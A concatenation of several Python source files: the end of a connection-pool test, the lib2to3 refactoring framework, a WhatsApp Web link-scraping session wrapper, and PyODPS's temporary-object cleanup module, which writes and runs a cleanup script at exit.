c1 = p.connect()
dbapi.connect.assert_has_calls([
call('foo.db'),
call('foo.db')],
any_order=True)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
refactor.py
|
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Refactoring framework.
Used as a main program, this can refactor any number of files and/or
recursively descend down directories. Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""
from __future__ import with_statement
__author__ = "Guido van Rossum <guido@python.org>"
# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain
# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_utils as bu
from . import btm_matcher as bm
def get_all_fix_names(fixer_pkg, remove_prefix=True):
"""Return a sorted list of all available fix names in the given package."""
pkg = __import__(fixer_pkg, [], [], ["*"])
fixer_dir = os.path.dirname(pkg.__file__)
fix_names = []
for name in sorted(os.listdir(fixer_dir)):
if name.startswith("fix_") and name.endswith(".py"):
if remove_prefix:
name = name[4:]
fix_names.append(name[:-3])
return fix_names
class _EveryNode(Exception):
pass
def _get_head_types(pat):
""" Accepts a pytree Pattern Node and returns a set
of the pattern types which will match first. """
if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
# NodePatters must either have no type and no content
# or a type and content -- so they don't get any farther
# Always return leafs
if pat.type is None:
raise _EveryNode
return set([pat.type])
if isinstance(pat, pytree.NegatedPattern):
if pat.content:
return _get_head_types(pat.content)
raise _EveryNode # Negated Patterns don't have a type
if isinstance(pat, pytree.WildcardPattern):
# Recurse on each node in content
r = set()
for p in pat.content:
for x in p:
r.update(_get_head_types(x))
return r
raise Exception("Oh no! I don't understand pattern %s" %(pat))
def _get_headnode_dict(fixer_list):
""" Accepts a list of fixers and returns a dictionary
of head node type --> fixer list. """
head_nodes = collections.defaultdict(list)
every = []
for fixer in fixer_list:
if fixer.pattern:
try:
heads = _get_head_types(fixer.pattern)
except _EveryNode:
every.append(fixer)
else:
for node_type in heads:
head_nodes[node_type].append(fixer)
else:
if fixer._accept_type is not None:
head_nodes[fixer._accept_type].append(fixer)
else:
every.append(fixer)
for node_type in chain(pygram.python_grammar.symbol2number.values(),
pygram.python_grammar.tokens):
head_nodes[node_type].extend(every)
return dict(head_nodes)
def get_fixers_from_package(pkg_name):
"""
Return the fully qualified names for fixers in the package pkg_name.
"""
return [pkg_name + "." + fix_name
for fix_name in get_all_fix_names(pkg_name, False)]
def _identity(obj):
return obj
if sys.version_info < (3, 0):
import codecs
_open_with_encoding = codecs.open
# codecs.open doesn't translate newlines sadly.
def _from_system_newlines(input):
return input.replace("\r\n", "\n")
def _to_system_newlines(input):
if os.linesep != "\n":
return input.replace("\n", os.linesep)
else:
return input
else:
_open_with_encoding = open
_from_system_newlines = _identity
_to_system_newlines = _identity
def _detect_future_features(source):
have_docstring = False
gen = tokenize.generate_tokens(io.StringIO(source).readline)
def advance():
tok = next(gen)
return tok[0], tok[1]
ignore = frozenset((token.NEWLINE, tokenize.NL, token.COMMENT))
features = set()
try:
while True:
tp, value = advance()
if tp in ignore:
continue
elif tp == token.STRING:
if have_docstring:
break
have_docstring = True
elif tp == token.NAME and value == "from":
tp, value = advance()
if tp != token.NAME or value != "__future__":
break
tp, value = advance()
if tp != token.NAME or value != "import":
break
tp, value = advance()
if tp == token.OP and value == "(":
tp, value = advance()
while tp == token.NAME:
features.add(value)
tp, value = advance()
if tp != token.OP or value != ",":
break
tp, value = advance()
else:
break
except StopIteration:
pass
return frozenset(features)
class FixerError(Exception):
"""A fixer could not be loaded."""
class RefactoringTool(object):
_default_options = {"print_function" : False,
"write_unchanged_files" : False}
CLASS_PREFIX = "Fix" # The prefix for fixer classes
FILE_PREFIX = "fix_" # The prefix for modules with a fixer within
def __init__(self, fixer_names, options=None, explicit=None):
"""Initializer.
Args:
fixer_names: a list of fixers to import
options: an dict with configuration.
explicit: a list of fixers to run even if they are explicit.
"""
self.fixers = fixer_names
self.explicit = explicit or []
self.options = self._default_options.copy()
if options is not None:
self.options.update(options)
if self.options["print_function"]:
self.grammar = pygram.python_grammar_no_print_statement
else:
self.grammar = pygram.python_grammar
# When this is True, the refactor*() methods will call write_file() for
# files processed even if they were not changed during refactoring. If
# and only if the refactor method's write parameter was True.
self.write_unchanged_files = self.options.get("write_unchanged_files")
self.errors = []
self.logger = logging.getLogger("RefactoringTool")
self.fixer_log = []
self.wrote = False
self.driver = driver.Driver(self.grammar,
convert=pytree.convert,
logger=self.logger)
self.pre_order, self.post_order = self.get_fixers()
self.files = [] # List of files that were or should be modified
self.BM = bm.BottomMatcher()
self.bmi_pre_order = [] # Bottom Matcher incompatible fixers
self.bmi_post_order = []
for fixer in chain(self.post_order, self.pre_order):
if fixer.BM_compatible:
self.BM.add_fixer(fixer)
# remove fixers that will be handled by the bottom-up
# matcher
elif fixer in self.pre_order:
self.bmi_pre_order.append(fixer)
elif fixer in self.post_order:
self.bmi_post_order.append(fixer)
self.bmi_pre_order_heads = _get_headnode_dict(self.bmi_pre_order)
self.bmi_post_order_heads = _get_headnode_dict(self.bmi_post_order)
def get_fixers(self):
"""Inspects the options to load the requested patterns and handlers.
Returns:
(pre_order, post_order), where pre_order is the list of fixers that
want a pre-order AST traversal, and post_order is the list that want
post-order traversal.
"""
pre_order_fixers = []
post_order_fixers = []
for fix_mod_path in self.fixers:
mod = __import__(fix_mod_path, {}, {}, ["*"])
fix_name = fix_mod_path.rsplit(".", 1)[-1]
if fix_name.startswith(self.FILE_PREFIX):
fix_name = fix_name[len(self.FILE_PREFIX):]
parts = fix_name.split("_")
class_name = self.CLASS_PREFIX + "".join([p.title() for p in parts])
try:
fix_class = getattr(mod, class_name)
except AttributeError:
raise FixerError("Can't find %s.%s" % (fix_name, class_name))
fixer = fix_class(self.options, self.fixer_log)
if fixer.explicit and self.explicit is not True and \
fix_mod_path not in self.explicit:
self.log_message("Skipping implicit fixer: %s", fix_name)
continue
self.log_debug("Adding transformation: %s", fix_name)
if fixer.order == "pre":
pre_order_fixers.append(fixer)
elif fixer.order == "post":
post_order_fixers.append(fixer)
else:
raise FixerError("Illegal fixer order: %r" % fixer.order)
key_func = operator.attrgetter("run_order")
pre_order_fixers.sort(key=key_func)
post_order_fixers.sort(key=key_func)
return (pre_order_fixers, post_order_fixers)
def log_error(self, msg, *args, **kwds):
"""Called when an error occurs."""
raise
def log_message(self, msg, *args):
"""Hook to log a message."""
if args:
msg = msg % args
self.logger.info(msg)
def log_debug(self, msg, *args):
if args:
msg = msg % args
self.logger.debug(msg)
def print_output(self, old_text, new_text, filename, equal):
"""Called with the old version, new version, and filename of a
refactored file."""
pass
def refactor(self, items, write=False, doctests_only=False):
"""Refactor a list of files and directories."""
for dir_or_file in items:
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file, write, doctests_only)
else:
self.refactor_file(dir_or_file, write, doctests_only)
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def _read_python_source(self, filename):
"""
Do our best to decode a Python source file correctly.
"""
try:
f = open(filename, "rb")
except IOError as err:
self.log_error("Can't open %s: %s", filename, err)
return None, None
try:
encoding = tokenize.detect_encoding(f.readline)[0]
finally:
f.close()
with _open_with_encoding(filename, "r", encoding=encoding) as f:
return _from_system_newlines(f.read()), encoding
def refactor_file(self, filename, write=False, doctests_only=False):
"""Refactors a file."""
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return
input += "\n" # Silence certain parse errors
if doctests_only:
self.log_debug("Refactoring doctests in %s", filename)
output = self.refactor_docstring(input, filename)
if self.write_unchanged_files or output != input:
self.processed_file(output, filename, input, write, encoding)
else:
self.log_debug("No doctest changes in %s", filename)
else:
tree = self.refactor_string(input, filename)
if self.write_unchanged_files or (tree and tree.was_changed):
# The [:-1] is to take off the \n we added earlier
self.processed_file(str(tree)[:-1], filename,
write=write, encoding=encoding)
else:
self.log_debug("No changes in %s", filename)
def refactor_string(self, data, name):
"""Refactor a given input string.
Args:
data: a string holding the code to be refactored.
name: a human-readable name for use in error/log messages.
Returns:
An AST corresponding to the refactored input stream; None if
there were errors during the parse.
"""
features = _detect_future_features(data)
if "print_function" in features:
self.driver.grammar = pygram.python_grammar_no_print_statement
try:
tree = self.driver.parse_string(data)
except Exception as err:
self.log_error("Can't parse %s: %s: %s",
name, err.__class__.__name__, err)
return
finally:
self.driver.grammar = self.grammar
tree.future_features = features
self.log_debug("Refactoring %s", name)
self.refactor_tree(tree, name)
return tree
def refactor_stdin(self, doctests_only=False):
input = sys.stdin.read()
if doctests_only:
self.log_debug("Refactoring doctests in stdin")
output = self.refactor_docstring(input, "<stdin>")
if self.write_unchanged_files or output != input:
self.processed_file(output, "<stdin>", input)
else:
self.log_debug("No doctest changes in stdin")
else:
tree = self.refactor_string(input, "<stdin>")
if self.write_unchanged_files or (tree and tree.was_changed):
self.processed_file(str(tree), "<stdin>", input)
else:
self.log_debug("No changes in stdin")
def refactor_tree(self, tree, name):
"""Refactors a parse tree (modifying the tree in place).
For compatible patterns the bottom matcher module is
used. Otherwise the tree is traversed node-to-node for
matches.
Args:
tree: a pytree.Node instance representing the root of the tree
to be refactored.
name: a human-readable name for this tree.
Returns:
True if the tree was modified, False otherwise.
"""
for fixer in chain(self.pre_order, self.post_order):
fixer.start_tree(tree, name)
#use traditional matching for the incompatible fixers
self.traverse_by(self.bmi_pre_order_heads, tree.pre_order())
self.traverse_by(self.bmi_post_order_heads, tree.post_order())
# obtain a set of candidate nodes
match_set = self.BM.run(tree.leaves())
while any(match_set.values()):
for fixer in self.BM.fixers:
if fixer in match_set and match_set[fixer]:
#sort by depth; apply fixers from bottom(of the AST) to top
match_set[fixer].sort(key=pytree.Base.depth, reverse=True)
if fixer.keep_line_order:
#some fixers(eg fix_imports) must be applied
#with the original file's line order
match_set[fixer].sort(key=pytree.Base.get_lineno)
for node in list(match_set[fixer]):
if node in match_set[fixer]:
match_set[fixer].remove(node)
try:
find_root(node)
except AssertionError:
# this node has been cut off from a
# previous transformation ; skip
continue
if node.fixers_applied and fixer in node.fixers_applied:
# do not apply the same fixer again
continue
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
#new.fixers_applied.append(fixer)
for node in new.post_order():
# do not apply the fixer again to
# this or any subnode
if not node.fixers_applied:
node.fixers_applied = []
node.fixers_applied.append(fixer)
# update the original match set for
# the added code
new_matches = self.BM.run(new.leaves())
for fxr in new_matches:
if not fxr in match_set:
match_set[fxr]=[]
match_set[fxr].extend(new_matches[fxr])
for fixer in chain(self.pre_order, self.post_order):
fixer.finish_tree(tree, name)
return tree.was_changed
def traverse_by(self, fixers, traversal):
"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
f = _open_with_encoding(filename, "w", encoding=encoding)
except os.error as err:
self.log_error("Can't create %s: %s", filename, err)
return
try:
f.write(_to_system_newlines(new_text))
except os.error as err:
self.log_error("Can't write %s: %s", filename, err)
finally:
f.close()
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
session.py
|
import logging
import time
import threading
from subprocess import TimeoutExpired
from threading import Thread
from typing import Mapping, Tuple, Optional
from selenium.common.exceptions import TimeoutException
from whatsappstract.whatsapp import Whatsapp
class WhatsappSession:
"""Wrapper around the Whatsapp class to remember state and do background scraping"""
def __init__(self, n_chats=2):
self.started_time = time.time()
self.w = Whatsapp(screenshot_folder="/tmp")
self._last_qr: str = None
self.links = None
self.lock = threading.Lock()
self._thread: Thread = None
self.status: str = "NOTSTARTED"
self._progress: int = None
self._message: str = None
self.n_chats: int = n_chats
def get_qr(self) -> str:
"""Go to whatsapp web and get the QR code"""
self._last_qr = self.w.get_qr()
return self._last_qr
def get_qr_status(self) -> dict:
"""Check if the user logged in and/or if a new QR code is displayed"""
if self.w.is_qr_scanned():
return {"status": "READY"}
try:
qr = self.w.get_qr()
except TimeoutException:
# Check if the app was loading the ready screen and is ready now
if self.w.is_qr_scanned():
return {"status": "READY"}
raise
if qr == self._last_qr:
return {"status": "WAITING"}
else:
self._last_qr = qr
return {"status": "REFRESH", "qr": qr}
def do_scrape(self):
logging.info("Starting scraper")
with self.lock:
if self.links is not None:
raise ValueError("Scraping already in progress")
self.links = []
self.status = "STARTED"
self._progress = 0
try:
self._do_scrape()
except Exception as e:
logging.exception("Error in scraper thread")
with self.lock:
self.status = "ERROR"
self._message = str(e)
self._progress = 0
else:
logging.info("Done!")
with self.lock:
self.status = "DONE"
self._message = f"Done, found {len(self.links)} in total"
self._progress = 100
finally:
self.w.quit_browser()
self.w = None
def _do_scrape(self):
time.sleep(3)
for i, chat in enumerate(self.w.get_all_chats()):
if i >= self.n_chats:
break
msg = f"Scraping contact {i + 1}/{self.n_chats}: {chat.text} [{len(self.links)} links found so far]"
logging.info(msg)
with self.lock:
self._progress = round(i * 100 / self.n_chats)
self._message = msg
links = list(self.w.get_links_per_chat(chat))
with self.lock:
self.links += links
def get_progress(self):
with self.lock:
return dict(status=self.status, progress=self._progress, message=self._message)
def start_scraping(self):
self._thread = threading.Thread(target=self.do_scrape)
logging.info("Starting thread")
self._thread.start()
# Each 'session' should have one object that stays in memory
# No, it's not the way HTTP should work, but what do you do about it.
REGISTRY: Mapping[str, WhatsappSession] = {}
def start_session(id: str) -> WhatsappSession:
prune_sessions()
global REGISTRY
assert id not in REGISTRY
REGISTRY[id] = WhatsappSession()
return REGISTRY[id]
def get_session(id: str) -> WhatsappSession:
global REGISTRY
assert id in REGISTRY
return REGISTRY[id]
def prune_sessions():
global REGISTRY
now = time.time()
n = len(REGISTRY)
for id, session in REGISTRY.items():
duration = now - session.started_time
if duration > 60*30:
logging.info(f"Sesssion {id} was started {duration} seconds ago, pruning")
if session.w is not None:
try:
session.w.quit_browser()
except:
logging.exception(f"Error on quitting browser in session {id}")
del REGISTRY[id]
logging.info(f"Pruning done, {len(REGISTRY)} sessions left out of {n}")
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
from .accounts import AliyunAccount
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
outf.close()
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# we do not clean running process, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
return hashlib.md5('####'.join([odps.account.access_id, odps.endpoint, odps.project]).encode('utf-8')).hexdigest()
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
